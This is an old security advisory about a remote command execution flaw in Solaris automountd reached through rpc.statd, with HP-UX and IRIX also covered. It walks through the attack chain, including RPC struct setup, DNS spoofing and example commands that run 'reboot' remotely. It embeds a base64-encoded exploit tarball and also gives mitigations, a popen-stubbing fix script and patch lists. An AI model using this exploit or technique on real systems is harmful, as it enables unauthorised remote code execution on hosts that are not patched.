COMMAND

    automountd

SYSTEMS AFFECTED

    Solaris 2.5, 2.5.1, 2.6,  2.7Beta (X86 and SPARC),  HP-9000 Series
    700/800 HP-UX releases 10.X and 11.00, IRIX

PROBLEM

    Corruptio  Optimi  Pessima  found  following.   Back  in  1995,  a
    vulnerability was  discovered and  a new  world of  buggy software
    born.   This   particular  bug,  would   be  conceived  when   Sun
    Microsystems  made  the  foolish  decision  to ship Solaris 2.5 to
    customers.  Since then, it has been a downhill roller coaster  for
    the boys and  girls at SUN.   Now, not only  is 2.5 affected,  but
    2.5.1 stock, 2.5.1 patched, 2.6 and 2.7 are all affected as well.

    When exploit code  for the local  automountd problem was  leaked a
    few YEARS ago,  SUN developed a  patch and labeled  it #104654-05.
    However, intrestingly enough, even  after the patch was  released,
    this  bug  could  still  be  exploited  quite trivially.  What SUN
    decided to do, was remove the 'popen' call and put in its place an
    'execve' call.   Absolutely brilliant.   Did they forget  that the
    variable holding  the program  and arguments  to be  execued could
    still be set  by issuing a  AUTOFS_MOUNT call to  automountd?  Or,
    is this  a case  of job  security by  one of  Sun's engineers?  We
    certainly feel it is the latter.  Either way, not only is this bug
    local, but it is remote too!   And, not only is it remote, but  it
    is started by default as well!

    Now, getting  back to  the bug  at hand,  a few  things have to be
    established  before  this  can  be  exploited.   First  of all, to
    remotely exploit this  bug, it becomes  two-pronged.  Meaning,  we
    are now going to introduce  another remote bug in the  SUN Solaris
    operating system that  when combined with  the previous, create  a
    lethal combination.  This new  bug, located in rpc.statd which  is
    also started by default (imagine that!), allows for remote packets
    to be bounced to the local Operating System.  Looking back at  the
    details of automountd, we  remember that it cannot  accept packets
    on UDP or TCP  protocols.  But, it  can accept packets on  the TLI
    protocol, which rpc.statd  happens to forward  to, allowing us  to
    remotely execute  commands by  sending our  packets to  rpc.statd.
    So, with all this in mind, if we send two RPC packets to rpc.statd
    on Solaris 2.5, 2.5.1 stock, 2.5.1 patched, 2.6, or 2.7, with  the
    SM_MON and SM_NOTIFY commands, rpc.statd will happily forward  the
    packet  on  to  the  local  operating  system's automountd daemon.
    Variables we will have to setup will be the following:

	struct mon monr;
	struct status stat;

	memset(&monr, 0, sizeof(struct mon));

	monr.mon_id.my_id.my_name = cache;
	monr.mon_id.my_id.my_prog = (unsigned long)AUTOFS_PROG;
	monr.mon_id.my_id.my_proc = (unsigned long)AUTOFS_MOUNT;

    mon_id.my_id.my_name will be our cache, which we will be using  to
    tell rpc.statd where to forward the packets to.  The cache of  the
    remote system can  be found by  establishing a connection  to port
    23, or  port 21  of the  system.   The cache  will usually  appear
    inside  parentheseis,  and  will  be  the hostname of the machine.
    Another example of obtaining the cache, would be to lookup the  ip
    address of the machine and use the hostname that comes back.

    For example,  for pathetic.sun.com,  you could  try 'pathetic'  or
    'pathetic.sun.com', and it will be a pretty safe bet that you will
    pick  the  correct  hostname.   mon_id.my_id.my_prog  will  be the
    variable  AUTOFS_PROG  telling  rpc.statd  which  RPC  service  to
    connect   to.    mon_id.my_id.my_proc   will   be   the   variable
    AUTOFS_MOUNT telling rpc.statd to  tell automountd that we  want a
    AUTOFS_MOUNT request.  Further variables to setup:

	monr.mon_id.my_id.my_vers = 1;  /* For Solaris 2.5, 2.5.1 */

    or

	monr.mon_id.my_id.my_vers = 2;  /* For Solaris 2.6, and 2.7 */

	monr.mon_id.mon_name = command;
	stat.mon_name = command;

    monr.mon_id.mon_name  and  stat.mon_name  will  both  contain  the
    program  to  execute  on  the  remote  system.   Now,  with  those
    variables setup,  we can  send off  our RPC  packets to the remote
    system.  However,  to complicate things  more, we must  modify our
    tekneeq of exploiting this bug, for it to succeed on 2.6 and  2.7.
    Because SUN implements a  new function called SMHASH  in rpc.statd
    on Solaris 2.6 and 2.7, we  will now have to involve DNS  spoofing
    to acomplish  executing our  command.   Because of  the way SMHASH
    works and the way RPC  arguments are encoded, our command  is what
    SMHASH attempts  to lookup  in its  address tables  once rpc.statd
    receives our packet.  If SMHASH cannot detect if our command is  a
    valid address, it will not forward the packet.  However, if we DNS
    spoof our  command off  the Primary  and Secondary  nameservers of
    the remote system, SMHASH will return true for finding the command
    as an address and our packet will be forwarded.

    If you wish to  test this bug without  DNS spoofing, you can  also
    modify the /etc/hosts  file on the  Solaris system and  put in the
    command  you  want  to  execute  (without arguments) as a hostname
    with an ip address, and it will accomplish the same affect.

    Examples
    ========
    If pathetic.sun.com were  a Solaris 2.7  machine with pathetic  as
    its hostname,  and a  vulnerable Primary  name server,  an exploit
    attempt would look like this:

	Execute commands to spoof reboot off Primary NS here
	./amountdexp pathetic.sun.com pathetic reboot 1

    If pathetic.sun.com were a Solaris 2.5.1 machine with pathetic  as
    its hostname, an exploit attempt would look like this:

	./amountdexp pathetic.sun.com pathetic reboot 0

    Exploit code for  this vulnerability can  be easily obtained  from
    the following URL) and below in  MIME code (note that in order  to
    work you must DNS spoof attack):

        http://www.attrition.org/hosted/cop/index.html

    Mime code of exploit:

    ---
    Content-Type: application/octet-stream; name="automountd.tar.gz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="automountd.tar.gz"
    Content-MD5: jN/hS35huap/9BPauGhnqw==

    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
    LJpIACgAAA==

    -----

SOLUTION

    Well, check  automountd manuals  and see  if you  need it.   It is
    obvious you'll  kick off  fro your  script vulnerable  program and
    wait for patch.  If you really need automountd, check alternatives
    or ask Sun.

    Statd doesn't  run as  root in  Solaris 7  so the automounter will
    ignore  its  requests.   This  change  was  made late in Solaris 7
    development  and  did  not  make  it  into  any  external release.
    The easiest  way to  work around  this problem  quickly is runnign
    statd  as  a  user  other  than  root,  to  this  end  change   in
    /etc/init.d/nfs.client as  follows (but  not on  Solaris 7,  where
    such a change may break statd).

	28c28
	<               /usr/lib/nfs/statd > /dev/console 2>&1
	---
	>               su daemon -c /usr/lib/nfs/statd > /dev/console 2>&1

    (make  sure  you  keep  the  links  in  /etc/rc?.d/[SK]*nfs.client
    pointing to /etc/init.d/nfs.client) and run:

	chown -R daemon /var/statmon
	chmod -R og-w /var/statmon

    Then stop and start lockd & statd.  2.5.1 is vulnerable for  patch
    104654-03  and  below,  not  vulnerable  once  104654-04 or higher
    applied.  Perhaps the forged DNS would have made 2.5.1  104654-04+
    vulnerable, but  using the  suggested test  with "/etc/hosts"  did
    not.

    As for HpUX, temporarily set:

        AutoFS = 0

    in

        /etc/rc.config.d/nfsconf

    Doug Siebert added  following.  Here  is a fix  that will work  on
    HP-UX 10.20 and 11.0 (11.0 not tested, but it should work) systems
    to  block  the  automountd  hole,  so  long  as  the  loss  of the
    executable  map  capability  isn't  a  problem  for  you.  See the
    comments in  the script  below which  implements the  fix.  Please
    remember  that  if  you  install  a patch that patches automountd,
    this fix will be wiped out, and you'll need to re-run this  script
    to regain  the protection.   You will  need either  the HP  ANSI C
    compiler or  gcc for  the script  to work,  the HP  base/bundled C
    compiler  can't  generate  position   independant  code.   HP   is
    adding/has added executable stack  protection to HP-UX 11,  and it
    is quite nice as  it is implemented on  a per binary basis.   Just
    look at the man page for  chatr(1) on a recently patched HP-UX  11
    system.   The  only  sad  thing  is  that for "compatibility", the
    default is the old, arguably  broken, behavior.  When you  see the
    tunable        'executable_stack'        show        up         in
    /usr/conf/master.d/core-hpux, you'll  want to  set it  to 0, which
    tells  it  to  use  the  bit  in  the  binary to permit/deny stack
    promotion.  That should eventually become the default.

    #!/usr/bin/sh
    #
    # This closes the HP automountd/autofs hole by creating a libc stub that takes
    # over the libc popen(3) function.  HP's automountd uses popen to implement
    # executable maps, which is a new feature of autofs versus the old style
    # automount, but is also the way this hole is exploited.  Even after it is
    # fixed, if you don't use executable maps you will probably sleep better if you
    # know executable maps have been completely disabled.  Obviously if you wish to
    # make use of executable maps, this fix is no good to you, and you'll have to
    # wait for an official patch from HP, and then keep your fingers crossed and
    # hope there isn't another hole waiting to be exploited.
    #
    # Douglas Siebert 10/23/99 (packaged as a script 12/24/99)
    #


    # Check that you are root
    if [ `whoami` != "root" ]; then
      echo "Must be root to run this script"
      exit 1
    fi

    # Change to autofs directory for this script
    cd /usr/lib/netsvc/fs/autofs
    umask 077

    # Create libc stub
    cat > libc.c << __EOF__
    #include <stdio.h>
    #include <syslog.h>

    FILE * popen(const char *command, const char *type)
    {
      syslog(LOG_ALERT, "Exploit attempted on automountd/autofs hole");
      return(NULL);
    }
    __EOF__

    # Compile it with cc or gcc (hopefully you've got one of them)
    /usr/bin/cc -c libc.c -Ae +z || gcc -c libc.c -fpic || NOCC=1
    if [ "$NOCC" ]; then
      echo "You must have the HP ANSI/C or gcc compiler on your system"
      rm -f libc.c
      exit 1
    fi
    rm -f libc.c

    # Create the stub libc with the real libc as a dependency (HP hates when you
    # do this)  I haven't yet tested this on HP-UX 11, but it should work.
    if [ -x /usr/lib/libc.2 ]; then
      rm -f libc.2
      /usr/bin/ld -b -o libc.2 libc.o /usr/lib/libc.2
      chmod 555 libc.2
    else
      rm -f libc.1
      /usr/bin/ld -b -o libc.1 libc.o /usr/lib/libc.1
      chmod 555 libc.1
    fi
    rm -f libc.o

    # Figure out where automountd is (there are at least two possibilities -- the
    # latest HP-UX 10.20 patches moved some stuff around and I don't know if the
    # automountd binary was in /usr/sbin before or not.  But in HP-UX 11 it has
    # moved to /usr/lib/netsvc/fs/autofs.  Hopefully those are the only possible
    # locations)
    if [ -x /usr/sbin/automountd ]; then
      AUTOMOUNTD_DIR=/usr/sbin
    elif [ -x /usr/lib/netsvc/fs/autofs/automountd ]; then
      AUTOMOUNTD_DIR=/usr/lib/netsvc/fs/autofs
    fi

    # Save unmodified automountd binary
    mv -f $AUTOMOUNTD_DIR/automountd $AUTOMOUNTD_DIR/automountd.ORIG

    # Set up new one to obey SHLIB_PATH
    cp -fp $AUTOMOUNTD_DIR/automountd.ORIG $AUTOMOUNTD_DIR/automountd.mod
    chatr +s enable $AUTOMOUNTD_DIR/automountd.mod >/dev/null

    # Create shell script to replace automountd
    cat > $AUTOMOUNTD_DIR/automountd << __EOF__
    #!/usr/bin/sh
    export SHLIB_PATH=/usr/lib/netsvc/fs/autofs
    exec $AUTOMOUNTD_DIR/automountd.mod "\$@"
    __EOF__
    chmod 555 $AUTOMOUNTD_DIR/automountd

    # Assume that if new libc.x exists, we succeeded...
    if [ -x libc.1 -o -x libc.2 ]; then
      echo "Success!  You must now reboot if you have autofs running"
      exit 0
    else
      echo "Something went wrong, but I have no idea what"
      exit 1
    fi

    Anyway, here's a patch list for HpUX:

        For HP-UX release 11.00  apply             PHNE_20371
        For HP-UX release 10.20  apply             PHNE_20628

    With patches from SGI Security Advisory 19981005-01-PX  installed,
    IRIX 6.2 and above ARE NOT vulnerable.